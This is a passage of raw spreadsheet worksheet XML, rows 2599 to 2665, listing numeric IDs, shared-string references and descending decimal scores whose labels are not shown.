      </c>
    </row>
    <row r="2599" ht="15.75" customHeight="1">
      <c r="A2599" s="1">
        <v>9299.0</v>
      </c>
      <c r="B2599" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2599" s="2" t="s">
        <v>2411</v>
      </c>
      <c r="D2599" s="2">
        <v>1.0</v>
      </c>
      <c r="E2599" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2599" s="2">
        <v>0.2213541666666667</v>
      </c>
    </row>
    <row r="2600" ht="15.75" customHeight="1">
      <c r="A2600" s="1">
        <v>9302.0</v>
      </c>
      <c r="B2600" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2600" s="2" t="s">
        <v>2412</v>
      </c>
      <c r="D2600" s="2">
        <v>1.0</v>
      </c>
      <c r="E2600" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2600" s="2">
        <v>0.221326164874552</v>
      </c>
    </row>
    <row r="2601" ht="15.75" customHeight="1">
      <c r="A2601" s="1">
        <v>1421.0</v>
      </c>
      <c r="B2601" s="2">
        <v>2.6546814E7</v>
      </c>
      <c r="C2601" s="2" t="s">
        <v>2413</v>
      </c>
      <c r="D2601" s="2">
        <v>1.0</v>
      </c>
      <c r="E2601" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2601" s="2">
        <v>0.217948717948718</v>
      </c>
    </row>
    <row r="2602" ht="15.75" customHeight="1">
      <c r="A2602" s="1">
        <v>2451.0</v>
      </c>
      <c r="B2602" s="2">
        <v>3.3713772E7</v>
      </c>
      <c r="C2602" s="2" t="s">
        <v>2414</v>
      </c>
      <c r="D2602" s="2">
        <v>1.0</v>
      </c>
      <c r="E2602" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2602" s="2">
        <v>0.2178130511463846</v>
      </c>
    </row>
    <row r="2603" ht="15.75" customHeight="1">
      <c r="A2603" s="1">
        <v>2216.0</v>
      </c>
      <c r="B2603" s="2">
        <v>3.2108511E7</v>
      </c>
      <c r="C2603" s="2" t="s">
        <v>2415</v>
      </c>
      <c r="D2603" s="2">
        <v>1.0</v>
      </c>
      <c r="E2603" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2603" s="2">
        <v>0.2168949771689498</v>
      </c>
    </row>
    <row r="2604" ht="15.75" customHeight="1">
      <c r="A2604" s="1">
        <v>1455.0</v>
      </c>
      <c r="B2604" s="2">
        <v>2.6865422E7</v>
      </c>
      <c r="C2604" s="2" t="s">
        <v>2416</v>
      </c>
      <c r="D2604" s="2">
        <v>1.0</v>
      </c>
      <c r="E2604" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2604" s="2">
        <v>0.2166666666666667</v>
      </c>
    </row>
    <row r="2605" ht="15.75" customHeight="1">
      <c r="A2605" s="1">
        <v>1329.0</v>
      </c>
      <c r="B2605" s="2">
        <v>2.5826325E7</v>
      </c>
      <c r="C2605" s="2" t="s">
        <v>2417</v>
      </c>
      <c r="D2605" s="2">
        <v>1.0</v>
      </c>
      <c r="E2605" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2605" s="2">
        <v>0.2157407407407408</v>
      </c>
    </row>
    <row r="2606" ht="15.75" customHeight="1">
      <c r="A2606" s="1">
        <v>9298.0</v>
      </c>
      <c r="B2606" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2606" s="2" t="s">
        <v>2411</v>
      </c>
      <c r="D2606" s="2">
        <v>1.0</v>
      </c>
      <c r="E2606" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2606" s="2">
        <v>0.2126736111111112</v>
      </c>
    </row>
    <row r="2607" ht="15.75" customHeight="1">
      <c r="A2607" s="1">
        <v>5337.0</v>
      </c>
      <c r="B2607" s="2">
        <v>4.5326959E7</v>
      </c>
      <c r="C2607" s="2" t="s">
        <v>2418</v>
      </c>
      <c r="D2607" s="2">
        <v>1.0</v>
      </c>
      <c r="E2607" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2607" s="2">
        <v>0.2125925925925926</v>
      </c>
    </row>
    <row r="2608" ht="15.75" customHeight="1">
      <c r="A2608" s="1">
        <v>15327.0</v>
      </c>
      <c r="B2608" s="2">
        <v>4.2527151E7</v>
      </c>
      <c r="C2608" s="2" t="s">
        <v>2419</v>
      </c>
      <c r="D2608" s="2">
        <v>1.0</v>
      </c>
      <c r="E2608" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2608" s="2">
        <v>0.2116736990154711</v>
      </c>
    </row>
    <row r="2609" ht="15.75" customHeight="1">
      <c r="A2609" s="1">
        <v>5168.0</v>
      </c>
      <c r="B2609" s="2">
        <v>4.4750867E7</v>
      </c>
      <c r="C2609" s="2" t="s">
        <v>2420</v>
      </c>
      <c r="D2609" s="2">
        <v>1.0</v>
      </c>
      <c r="E2609" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2609" s="2">
        <v>0.2114427860696518</v>
      </c>
    </row>
    <row r="2610" ht="15.75" customHeight="1">
      <c r="A2610" s="1">
        <v>18484.0</v>
      </c>
      <c r="B2610" s="2">
        <v>5.2890089E7</v>
      </c>
      <c r="C2610" s="2" t="s">
        <v>2421</v>
      </c>
      <c r="D2610" s="2">
        <v>1.0</v>
      </c>
      <c r="E2610" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2610" s="2">
        <v>0.2097701149425287</v>
      </c>
    </row>
    <row r="2611" ht="15.75" customHeight="1">
      <c r="A2611" s="1">
        <v>28507.0</v>
      </c>
      <c r="B2611" s="2">
        <v>2.6717473E7</v>
      </c>
      <c r="C2611" s="2" t="s">
        <v>2422</v>
      </c>
      <c r="D2611" s="2">
        <v>1.0</v>
      </c>
      <c r="E2611" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2611" s="2">
        <v>0.2089646464646465</v>
      </c>
    </row>
    <row r="2612" ht="15.75" customHeight="1">
      <c r="A2612" s="1">
        <v>1739.0</v>
      </c>
      <c r="B2612" s="2">
        <v>2.8792085E7</v>
      </c>
      <c r="C2612" s="2" t="s">
        <v>2423</v>
      </c>
      <c r="D2612" s="2">
        <v>1.0</v>
      </c>
      <c r="E2612" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2612" s="2">
        <v>0.2086988304093567</v>
      </c>
    </row>
    <row r="2613" ht="15.75" customHeight="1">
      <c r="A2613" s="1">
        <v>9008.0</v>
      </c>
      <c r="B2613" s="2">
        <v>5.4974902E7</v>
      </c>
      <c r="C2613" s="2" t="s">
        <v>2424</v>
      </c>
      <c r="D2613" s="2">
        <v>1.0</v>
      </c>
      <c r="E2613" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2613" s="2">
        <v>0.208656330749354</v>
      </c>
    </row>
    <row r="2614" ht="15.75" customHeight="1">
      <c r="A2614" s="1">
        <v>19693.0</v>
      </c>
      <c r="B2614" s="2">
        <v>5.6472479E7</v>
      </c>
      <c r="C2614" s="2" t="s">
        <v>2425</v>
      </c>
      <c r="D2614" s="2">
        <v>1.0</v>
      </c>
      <c r="E2614" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2614" s="2">
        <v>0.2079124579124579</v>
      </c>
    </row>
    <row r="2615" ht="15.75" customHeight="1">
      <c r="A2615" s="1">
        <v>9184.0</v>
      </c>
      <c r="B2615" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C2615" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="D2615" s="2">
        <v>1.0</v>
      </c>
      <c r="E2615" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2615" s="2">
        <v>0.2075617283950618</v>
      </c>
    </row>
    <row r="2616" ht="15.75" customHeight="1">
      <c r="A2616" s="1">
        <v>5021.0</v>
      </c>
      <c r="B2616" s="2">
        <v>4.4223563E7</v>
      </c>
      <c r="C2616" s="2" t="s">
        <v>2427</v>
      </c>
      <c r="D2616" s="2">
        <v>1.0</v>
      </c>
      <c r="E2616" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2616" s="2">
        <v>0.2044753086419754</v>
      </c>
    </row>
    <row r="2617" ht="15.75" customHeight="1">
      <c r="A2617" s="1">
        <v>13601.0</v>
      </c>
      <c r="B2617" s="2">
        <v>3.5786578E7</v>
      </c>
      <c r="C2617" s="2" t="s">
        <v>2428</v>
      </c>
      <c r="D2617" s="2">
        <v>1.0</v>
      </c>
      <c r="E2617" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2617" s="2">
        <v>0.2043650793650794</v>
      </c>
    </row>
    <row r="2618" ht="15.75" customHeight="1">
      <c r="A2618" s="1">
        <v>6798.0</v>
      </c>
      <c r="B2618" s="2">
        <v>4.9517894E7</v>
      </c>
      <c r="C2618" s="2" t="s">
        <v>2429</v>
      </c>
      <c r="D2618" s="2">
        <v>1.0</v>
      </c>
      <c r="E2618" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2618" s="2">
        <v>0.2042735042735043</v>
      </c>
    </row>
    <row r="2619" ht="15.75" customHeight="1">
      <c r="A2619" s="1">
        <v>6574.0</v>
      </c>
      <c r="B2619" s="2">
        <v>4.8915204E7</v>
      </c>
      <c r="C2619" s="2" t="s">
        <v>2430</v>
      </c>
      <c r="D2619" s="2">
        <v>1.0</v>
      </c>
      <c r="E2619" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2619" s="2">
        <v>0.2025641025641026</v>
      </c>
    </row>
    <row r="2620" ht="15.75" customHeight="1">
      <c r="A2620" s="1">
        <v>31967.0</v>
      </c>
      <c r="B2620" s="2">
        <v>5314761.0</v>
      </c>
      <c r="C2620" s="2" t="s">
        <v>2431</v>
      </c>
      <c r="D2620" s="2">
        <v>1.0</v>
      </c>
      <c r="E2620" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2620" s="2">
        <v>0.2004830917874397</v>
      </c>
    </row>
    <row r="2621" ht="15.75" customHeight="1">
      <c r="A2621" s="1">
        <v>27503.0</v>
      </c>
      <c r="B2621" s="2">
        <v>2.2093594E7</v>
      </c>
      <c r="C2621" s="2" t="s">
        <v>2432</v>
      </c>
      <c r="D2621" s="2">
        <v>1.0</v>
      </c>
      <c r="E2621" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2621" s="2">
        <v>0.1971544715447154</v>
      </c>
    </row>
    <row r="2622" ht="15.75" customHeight="1">
      <c r="A2622" s="1">
        <v>9920.0</v>
      </c>
      <c r="B2622" s="2">
        <v>5.6818173E7</v>
      </c>
      <c r="C2622" s="2" t="s">
        <v>2433</v>
      </c>
      <c r="D2622" s="2">
        <v>1.0</v>
      </c>
      <c r="E2622" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2622" s="2">
        <v>0.1961279461279462</v>
      </c>
    </row>
    <row r="2623" ht="15.75" customHeight="1">
      <c r="A2623" s="1">
        <v>5201.0</v>
      </c>
      <c r="B2623" s="2">
        <v>4.4884324E7</v>
      </c>
      <c r="C2623" s="2" t="s">
        <v>2434</v>
      </c>
      <c r="D2623" s="2">
        <v>1.0</v>
      </c>
      <c r="E2623" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2623" s="2">
        <v>0.1939890710382514</v>
      </c>
    </row>
    <row r="2624" ht="15.75" customHeight="1">
      <c r="A2624" s="1">
        <v>3627.0</v>
      </c>
      <c r="B2624" s="2">
        <v>3.9217057E7</v>
      </c>
      <c r="C2624" s="2" t="s">
        <v>2435</v>
      </c>
      <c r="D2624" s="2">
        <v>1.0</v>
      </c>
      <c r="E2624" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2624" s="2">
        <v>0.1939571150097467</v>
      </c>
    </row>
    <row r="2625" ht="15.75" customHeight="1">
      <c r="A2625" s="1">
        <v>5618.0</v>
      </c>
      <c r="B2625" s="2">
        <v>4.6181521E7</v>
      </c>
      <c r="C2625" s="2" t="s">
        <v>2436</v>
      </c>
      <c r="D2625" s="2">
        <v>1.0</v>
      </c>
      <c r="E2625" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2625" s="2">
        <v>0.1936274509803922</v>
      </c>
    </row>
    <row r="2626" ht="15.75" customHeight="1">
      <c r="A2626" s="1">
        <v>4804.0</v>
      </c>
      <c r="B2626" s="2">
        <v>4.3537872E7</v>
      </c>
      <c r="C2626" s="2" t="s">
        <v>2437</v>
      </c>
      <c r="D2626" s="2">
        <v>1.0</v>
      </c>
      <c r="E2626" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2626" s="2">
        <v>0.1927609427609428</v>
      </c>
    </row>
    <row r="2627" ht="15.75" customHeight="1">
      <c r="A2627" s="1">
        <v>15991.0</v>
      </c>
      <c r="B2627" s="2">
        <v>4.4936083E7</v>
      </c>
      <c r="C2627" s="2" t="s">
        <v>2438</v>
      </c>
      <c r="D2627" s="2">
        <v>1.0</v>
      </c>
      <c r="E2627" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2627" s="2">
        <v>0.192652329749104</v>
      </c>
    </row>
    <row r="2628" ht="15.75" customHeight="1">
      <c r="A2628" s="1">
        <v>17826.0</v>
      </c>
      <c r="B2628" s="2">
        <v>5.0916034E7</v>
      </c>
      <c r="C2628" s="2" t="s">
        <v>2439</v>
      </c>
      <c r="D2628" s="2">
        <v>1.0</v>
      </c>
      <c r="E2628" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2628" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="2629" ht="15.75" customHeight="1">
      <c r="A2629" s="1">
        <v>4877.0</v>
      </c>
      <c r="B2629" s="2">
        <v>4.3851459E7</v>
      </c>
      <c r="C2629" s="2" t="s">
        <v>2440</v>
      </c>
      <c r="D2629" s="2">
        <v>1.0</v>
      </c>
      <c r="E2629" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2629" s="2">
        <v>0.191860465116279</v>
      </c>
    </row>
    <row r="2630" ht="15.75" customHeight="1">
      <c r="A2630" s="1">
        <v>2459.0</v>
      </c>
      <c r="B2630" s="2">
        <v>3.3729668E7</v>
      </c>
      <c r="C2630" s="2" t="s">
        <v>2441</v>
      </c>
      <c r="D2630" s="2">
        <v>1.0</v>
      </c>
      <c r="E2630" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2630" s="2">
        <v>0.1913580246913581</v>
      </c>
    </row>
    <row r="2631" ht="15.75" customHeight="1">
      <c r="A2631" s="1">
        <v>13343.0</v>
      </c>
      <c r="B2631" s="2">
        <v>3.4694619E7</v>
      </c>
      <c r="C2631" s="2" t="s">
        <v>2442</v>
      </c>
      <c r="D2631" s="2">
        <v>1.0</v>
      </c>
      <c r="E2631" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2631" s="2">
        <v>0.1910197869101979</v>
      </c>
    </row>
    <row r="2632" ht="15.75" customHeight="1">
      <c r="A2632" s="1">
        <v>9023.0</v>
      </c>
      <c r="B2632" s="2">
        <v>5.5016271E7</v>
      </c>
      <c r="C2632" s="2" t="s">
        <v>2443</v>
      </c>
      <c r="D2632" s="2">
        <v>1.0</v>
      </c>
      <c r="E2632" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2632" s="2">
        <v>0.1908212560386474</v>
      </c>
    </row>
    <row r="2633" ht="15.75" customHeight="1">
      <c r="A2633" s="1">
        <v>2770.0</v>
      </c>
      <c r="B2633" s="2">
        <v>3.5153377E7</v>
      </c>
      <c r="C2633" s="2" t="s">
        <v>2444</v>
      </c>
      <c r="D2633" s="2">
        <v>1.0</v>
      </c>
      <c r="E2633" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2633" s="2">
        <v>0.1907894736842106</v>
      </c>
    </row>
    <row r="2634" ht="15.75" customHeight="1">
      <c r="A2634" s="1">
        <v>11573.0</v>
      </c>
      <c r="B2634" s="2">
        <v>2.2773671E7</v>
      </c>
      <c r="C2634" s="2" t="s">
        <v>2445</v>
      </c>
      <c r="D2634" s="2">
        <v>1.0</v>
      </c>
      <c r="E2634" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2634" s="2">
        <v>0.1902173913043478</v>
      </c>
    </row>
    <row r="2635" ht="15.75" customHeight="1">
      <c r="A2635" s="1">
        <v>12160.0</v>
      </c>
      <c r="B2635" s="2">
        <v>2.7310035E7</v>
      </c>
      <c r="C2635" s="2" t="s">
        <v>2446</v>
      </c>
      <c r="D2635" s="2">
        <v>1.0</v>
      </c>
      <c r="E2635" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2635" s="2">
        <v>0.1896551724137931</v>
      </c>
    </row>
    <row r="2636" ht="15.75" customHeight="1">
      <c r="A2636" s="1">
        <v>8479.0</v>
      </c>
      <c r="B2636" s="2">
        <v>5.4015748E7</v>
      </c>
      <c r="C2636" s="2" t="s">
        <v>2447</v>
      </c>
      <c r="D2636" s="2">
        <v>1.0</v>
      </c>
      <c r="E2636" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2636" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="2637" ht="15.75" customHeight="1">
      <c r="A2637" s="1">
        <v>752.0</v>
      </c>
      <c r="B2637" s="2">
        <v>2.0936081E7</v>
      </c>
      <c r="C2637" s="2" t="s">
        <v>2448</v>
      </c>
      <c r="D2637" s="2">
        <v>1.0</v>
      </c>
      <c r="E2637" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2637" s="2">
        <v>0.1879629629629631</v>
      </c>
    </row>
    <row r="2638" ht="15.75" customHeight="1">
      <c r="A2638" s="1">
        <v>3709.0</v>
      </c>
      <c r="B2638" s="2">
        <v>3.9597982E7</v>
      </c>
      <c r="C2638" s="2" t="s">
        <v>2449</v>
      </c>
      <c r="D2638" s="2">
        <v>1.0</v>
      </c>
      <c r="E2638" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2638" s="2">
        <v>0.1843434343434344</v>
      </c>
    </row>
    <row r="2639" ht="15.75" customHeight="1">
      <c r="A2639" s="1">
        <v>9421.0</v>
      </c>
      <c r="B2639" s="2">
        <v>5.5794304E7</v>
      </c>
      <c r="C2639" s="2" t="s">
        <v>2450</v>
      </c>
      <c r="D2639" s="2">
        <v>1.0</v>
      </c>
      <c r="E2639" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2639" s="2">
        <v>0.18125</v>
      </c>
    </row>
    <row r="2640" ht="15.75" customHeight="1">
      <c r="A2640" s="1">
        <v>16363.0</v>
      </c>
      <c r="B2640" s="2">
        <v>4.6130144E7</v>
      </c>
      <c r="C2640" s="2" t="s">
        <v>2451</v>
      </c>
      <c r="D2640" s="2">
        <v>1.0</v>
      </c>
      <c r="E2640" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2640" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="2641" ht="15.75" customHeight="1">
      <c r="A2641" s="1">
        <v>1515.0</v>
      </c>
      <c r="B2641" s="2">
        <v>2.7323249E7</v>
      </c>
      <c r="C2641" s="2" t="s">
        <v>2452</v>
      </c>
      <c r="D2641" s="2">
        <v>1.0</v>
      </c>
      <c r="E2641" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2641" s="2">
        <v>0.1810035842293907</v>
      </c>
    </row>
    <row r="2642" ht="15.75" customHeight="1">
      <c r="A2642" s="1">
        <v>12941.0</v>
      </c>
      <c r="B2642" s="2">
        <v>3.237281E7</v>
      </c>
      <c r="C2642" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="D2642" s="2">
        <v>1.0</v>
      </c>
      <c r="E2642" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2642" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="2643" ht="15.75" customHeight="1">
      <c r="A2643" s="1">
        <v>7244.0</v>
      </c>
      <c r="B2643" s="2">
        <v>5.0698493E7</v>
      </c>
      <c r="C2643" s="2" t="s">
        <v>2454</v>
      </c>
      <c r="D2643" s="2">
        <v>1.0</v>
      </c>
      <c r="E2643" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2643" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="2644" ht="15.75" customHeight="1">
      <c r="A2644" s="1">
        <v>9689.0</v>
      </c>
      <c r="B2644" s="2">
        <v>5.6348803E7</v>
      </c>
      <c r="C2644" s="2" t="s">
        <v>2455</v>
      </c>
      <c r="D2644" s="2">
        <v>1.0</v>
      </c>
      <c r="E2644" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2644" s="2">
        <v>0.18</v>
      </c>
    </row>
    <row r="2645" ht="15.75" customHeight="1">
      <c r="A2645" s="1">
        <v>18191.0</v>
      </c>
      <c r="B2645" s="2">
        <v>5.2028029E7</v>
      </c>
      <c r="C2645" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="D2645" s="2">
        <v>1.0</v>
      </c>
      <c r="E2645" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2645" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="2646" ht="15.75" customHeight="1">
      <c r="A2646" s="1">
        <v>15086.0</v>
      </c>
      <c r="B2646" s="2">
        <v>4.1777968E7</v>
      </c>
      <c r="C2646" s="2" t="s">
        <v>2457</v>
      </c>
      <c r="D2646" s="2">
        <v>1.0</v>
      </c>
      <c r="E2646" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2646" s="2">
        <v>0.177951388888889</v>
      </c>
    </row>
    <row r="2647" ht="15.75" customHeight="1">
      <c r="A2647" s="1">
        <v>17149.0</v>
      </c>
      <c r="B2647" s="2">
        <v>4.8850788E7</v>
      </c>
      <c r="C2647" s="2" t="s">
        <v>2458</v>
      </c>
      <c r="D2647" s="2">
        <v>1.0</v>
      </c>
      <c r="E2647" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2647" s="2">
        <v>0.177938808373591</v>
      </c>
    </row>
    <row r="2648" ht="15.75" customHeight="1">
      <c r="A2648" s="1">
        <v>13699.0</v>
      </c>
      <c r="B2648" s="2">
        <v>3.6155433E7</v>
      </c>
      <c r="C2648" s="2" t="s">
        <v>2459</v>
      </c>
      <c r="D2648" s="2">
        <v>1.0</v>
      </c>
      <c r="E2648" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2648" s="2">
        <v>0.1773211567732116</v>
      </c>
    </row>
    <row r="2649" ht="15.75" customHeight="1">
      <c r="A2649" s="1">
        <v>311.0</v>
      </c>
      <c r="B2649" s="2">
        <v>1.5621246E7</v>
      </c>
      <c r="C2649" s="2" t="s">
        <v>2460</v>
      </c>
      <c r="D2649" s="2">
        <v>1.0</v>
      </c>
      <c r="E2649" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2649" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="2650" ht="15.75" customHeight="1">
      <c r="A2650" s="1">
        <v>3119.0</v>
      </c>
      <c r="B2650" s="2">
        <v>3.6808011E7</v>
      </c>
      <c r="C2650" s="2" t="s">
        <v>2461</v>
      </c>
      <c r="D2650" s="2">
        <v>1.0</v>
      </c>
      <c r="E2650" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2650" s="2">
        <v>0.1766169154228856</v>
      </c>
    </row>
    <row r="2651" ht="15.75" customHeight="1">
      <c r="A2651" s="1">
        <v>11650.0</v>
      </c>
      <c r="B2651" s="2">
        <v>2.3249698E7</v>
      </c>
      <c r="C2651" s="2" t="s">
        <v>2462</v>
      </c>
      <c r="D2651" s="2">
        <v>1.0</v>
      </c>
      <c r="E2651" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2651" s="2">
        <v>0.1757741347905283</v>
      </c>
    </row>
    <row r="2652" ht="15.75" customHeight="1">
      <c r="A2652" s="1">
        <v>574.0</v>
      </c>
      <c r="B2652" s="2">
        <v>1.9081698E7</v>
      </c>
      <c r="C2652" s="2" t="s">
        <v>2463</v>
      </c>
      <c r="D2652" s="2">
        <v>1.0</v>
      </c>
      <c r="E2652" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2652" s="2">
        <v>0.1754850088183422</v>
      </c>
    </row>
    <row r="2653" ht="15.75" customHeight="1">
      <c r="A2653" s="1">
        <v>30732.0</v>
      </c>
      <c r="B2653" s="2">
        <v>4.3963905E7</v>
      </c>
      <c r="C2653" s="2" t="s">
        <v>2464</v>
      </c>
      <c r="D2653" s="2">
        <v>1.0</v>
      </c>
      <c r="E2653" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2653" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="2654" ht="15.75" customHeight="1">
      <c r="A2654" s="1">
        <v>2684.0</v>
      </c>
      <c r="B2654" s="2">
        <v>3.4810211E7</v>
      </c>
      <c r="C2654" s="2" t="s">
        <v>2465</v>
      </c>
      <c r="D2654" s="2">
        <v>1.0</v>
      </c>
      <c r="E2654" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2654" s="2">
        <v>0.175</v>
      </c>
    </row>
    <row r="2655" ht="15.75" customHeight="1">
      <c r="A2655" s="1">
        <v>7531.0</v>
      </c>
      <c r="B2655" s="2">
        <v>5.1464806E7</v>
      </c>
      <c r="C2655" s="2" t="s">
        <v>2466</v>
      </c>
      <c r="D2655" s="2">
        <v>1.0</v>
      </c>
      <c r="E2655" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2655" s="2">
        <v>0.175</v>
      </c>
    </row>
    <row r="2656" ht="15.75" customHeight="1">
      <c r="A2656" s="1">
        <v>3970.0</v>
      </c>
      <c r="B2656" s="2">
        <v>4.0771272E7</v>
      </c>
      <c r="C2656" s="2" t="s">
        <v>2467</v>
      </c>
      <c r="D2656" s="2">
        <v>1.0</v>
      </c>
      <c r="E2656" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2656" s="2">
        <v>0.1749585406301825</v>
      </c>
    </row>
    <row r="2657" ht="15.75" customHeight="1">
      <c r="A2657" s="1">
        <v>5893.0</v>
      </c>
      <c r="B2657" s="2">
        <v>4.7098851E7</v>
      </c>
      <c r="C2657" s="2" t="s">
        <v>2468</v>
      </c>
      <c r="D2657" s="2">
        <v>1.0</v>
      </c>
      <c r="E2657" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2657" s="2">
        <v>0.1749585406301824</v>
      </c>
    </row>
    <row r="2658" ht="15.75" customHeight="1">
      <c r="A2658" s="1">
        <v>13200.0</v>
      </c>
      <c r="B2658" s="2">
        <v>3.4131437E7</v>
      </c>
      <c r="C2658" s="2" t="s">
        <v>2469</v>
      </c>
      <c r="D2658" s="2">
        <v>1.0</v>
      </c>
      <c r="E2658" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2658" s="2">
        <v>0.174731182795699</v>
      </c>
    </row>
    <row r="2659" ht="15.75" customHeight="1">
      <c r="A2659" s="1">
        <v>2565.0</v>
      </c>
      <c r="B2659" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C2659" s="2" t="s">
        <v>2470</v>
      </c>
      <c r="D2659" s="2">
        <v>1.0</v>
      </c>
      <c r="E2659" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2659" s="2">
        <v>0.174491392801252</v>
      </c>
    </row>
    <row r="2660" ht="15.75" customHeight="1">
      <c r="A2660" s="1">
        <v>2427.0</v>
      </c>
      <c r="B2660" s="2">
        <v>3.358755E7</v>
      </c>
      <c r="C2660" s="2" t="s">
        <v>2471</v>
      </c>
      <c r="D2660" s="2">
        <v>1.0</v>
      </c>
      <c r="E2660" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2660" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="2661" ht="15.75" customHeight="1">
      <c r="A2661" s="1">
        <v>17121.0</v>
      </c>
      <c r="B2661" s="2">
        <v>4.8799181E7</v>
      </c>
      <c r="C2661" s="2" t="s">
        <v>2472</v>
      </c>
      <c r="D2661" s="2">
        <v>1.0</v>
      </c>
      <c r="E2661" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2661" s="2">
        <v>0.1744639376218325</v>
      </c>
    </row>
    <row r="2662" ht="15.75" customHeight="1">
      <c r="A2662" s="1">
        <v>9501.0</v>
      </c>
      <c r="B2662" s="2">
        <v>5.5931557E7</v>
      </c>
      <c r="C2662" s="2" t="s">
        <v>2473</v>
      </c>
      <c r="D2662" s="2">
        <v>1.0</v>
      </c>
      <c r="E2662" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2662" s="2">
        <v>0.1743055555555556</v>
      </c>
    </row>
    <row r="2663" ht="15.75" customHeight="1">
      <c r="A2663" s="1">
        <v>2507.0</v>
      </c>
      <c r="B2663" s="2">
        <v>3.3963305E7</v>
      </c>
      <c r="C2663" s="2" t="s">
        <v>2474</v>
      </c>
      <c r="D2663" s="2">
        <v>1.0</v>
      </c>
      <c r="E2663" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2663" s="2">
        <v>0.1742770167427702</v>
      </c>
    </row>
    <row r="2664" ht="15.75" customHeight="1">
      <c r="A2664" s="1">
        <v>11461.0</v>
      </c>
      <c r="B2664" s="2">
        <v>2.1914322E7</v>
      </c>
      <c r="C2664" s="2" t="s">
        <v>2475</v>
      </c>
      <c r="D2664" s="2">
        <v>1.0</v>
      </c>
      <c r="E2664" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2664" s="2">
        <v>0.1738095238095239</v>
      </c>
    </row>
    <row r="2665" ht="15.75" customHeight="1">
      <c r="A2665" s="1">
        <v>765.0</v>
      </c>
      <c r="B2665" s="2">
        <v>2.1049912E7</v>
      </c>
      <c r="C2665" s="2" t="s">
        <v>2476</v>
      </c>
      <c r="D2665" s="2">
        <v>1.0</v>
      </c>
      <c r="E2665" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2665" s="2">
        <v>0.1736111111111112</v>
      </c>
    </row>
